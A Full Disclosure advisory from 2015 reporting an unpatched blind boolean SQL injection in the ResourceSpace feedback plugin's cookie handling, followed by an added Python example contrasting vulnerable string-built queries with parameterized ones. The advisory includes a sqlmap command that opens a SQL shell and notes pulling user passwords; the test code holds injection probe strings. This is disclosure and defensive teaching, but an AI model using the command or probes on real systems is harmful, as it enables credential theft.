Message-ID: <CAB3n5ndfBfOvzyx4oh=EAz9mwh2xwRkd8KG2d_CXjiK5X9GsBQ@mail.gmail.com>
Date: Sat, 22 Aug 2015 11:53:56 -0700
From: William Reyor <opticfiber@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Blind boolean SQL injection vulnerability in ResourceSpace CMS
Title: Blind boolean SQL injection vulnerability in ResourceSpace CMS
Author: William F. Reyor III
Contact: opticfiber@...il.com
Published: August 22 2015
Vendor: Montala Limited
Vendor url: www.resourcespace.org
Software: ResourceSpace Digital Asset Management Software
Versions: 7.3.7009 and prior
Status: Unpatched
Vulnerable scripts:
/plugins/feedback/pages/feedback.php
Description:
There is a blind boolean SQL injection vulnerability in the handling of the
user cookie by the /plugins/feedback/pages/feedback.php script.
This can be validated with sqlmap using the following flags, which give a
full SQL shell:
./sqlmap.py -u "http://<hostname>/plugins/feedback/pages/feedback.php" \
    --cookie="user=test" --level=2 --technique=B --sql-shell
This also allows an attacker to execute arbitrary queries such as
'select username, password, usergroup from user'.
--
William Reyor
*"What is essential is invisible to the eye"*
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
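
The flaw class reported above, shown as an added example that is not part of the original advisory and is not ResourceSpace code: a cookie value concatenated into a SQL string yields a true/false oracle, while validating and binding the value removes it. The table layout, function names and session-token format are constructed assumptions.

```python
import re
import sqlite3

# Constructed stand-in for an application's user table (not ResourceSpace's schema).
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE user (username TEXT, session TEXT)")
    db.execute("INSERT INTO user VALUES ('alice', 'a3f1c29b7d')")
    return db

def lookup_vulnerable(db, cookie):
    # Cookie text is spliced into the SQL string, so a quote in the cookie
    # changes the query's structure and therefore its true/false outcome.
    sql = "SELECT username FROM user WHERE session = '" + cookie + "'"
    return db.execute(sql).fetchone() is not None

SESSION_RE = re.compile(r"[0-9a-f]{10}")  # assumed session-token format

def lookup_hardened(db, cookie):
    # Reject anything not shaped like a token, then bind the value as data.
    if not SESSION_RE.fullmatch(cookie):
        return False
    row = db.execute(
        "SELECT username FROM user WHERE session = ?", (cookie,)
    ).fetchone()
    return row is not None

def boolean_oracle_present(lookup, db):
    # Regression check: two invalid cookies that differ only in an appended
    # always-true / always-false condition must get the same answer.
    probe_true = "invalid' OR '1'='1"
    probe_false = "invalid' AND '1'='2"
    return lookup(db, probe_true) != lookup(db, probe_false)

if __name__ == "__main__":
    db = make_db()
    print("vulnerable lookup leaks a boolean:", boolean_oracle_present(lookup_vulnerable, db))
    print("hardened lookup leaks a boolean:  ", boolean_oracle_present(lookup_hardened, db))
```

A check like `boolean_oracle_present` can be kept as a regression test for every code path that reads a cookie before authentication.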